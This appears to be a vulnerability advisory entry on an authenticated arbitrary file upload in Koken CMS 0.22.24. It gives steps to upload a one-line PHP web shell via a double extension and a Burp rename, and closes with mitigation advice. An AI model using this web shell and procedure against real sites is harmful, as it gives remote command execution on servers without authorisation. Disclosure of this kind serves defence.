vendor:
Koken CMS
by:
v1n1v131r4
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Koken CMS
Affected Version From: 0.22.24
Affected Version To: 0.22.24
Patch Exists: NO
Related CWE: N/A
CPE: a:koken:koken
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Linux
2020
Koken CMS 0.22.24 – Arbitrary File Upload (Authenticated)
The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp. Steps to exploit: 1. Create a malicious PHP file with this content: <?php system($_GET['cmd']);?> 2. Save as 'image.php.jpg' 3. Authenticated, go to Koken CMS Dashboard, upload your file on 'Import Content' button (Library panel) and send the HTTP request to Burp. 4. On Burp, rename your file to 'image.php'
Mitigation:
Enforce strong authentication and authorization policies, and restrict access to the application to trusted users. Ensure that the application is configured to accept only a limited set of file types, and validate the file type before accepting the upload.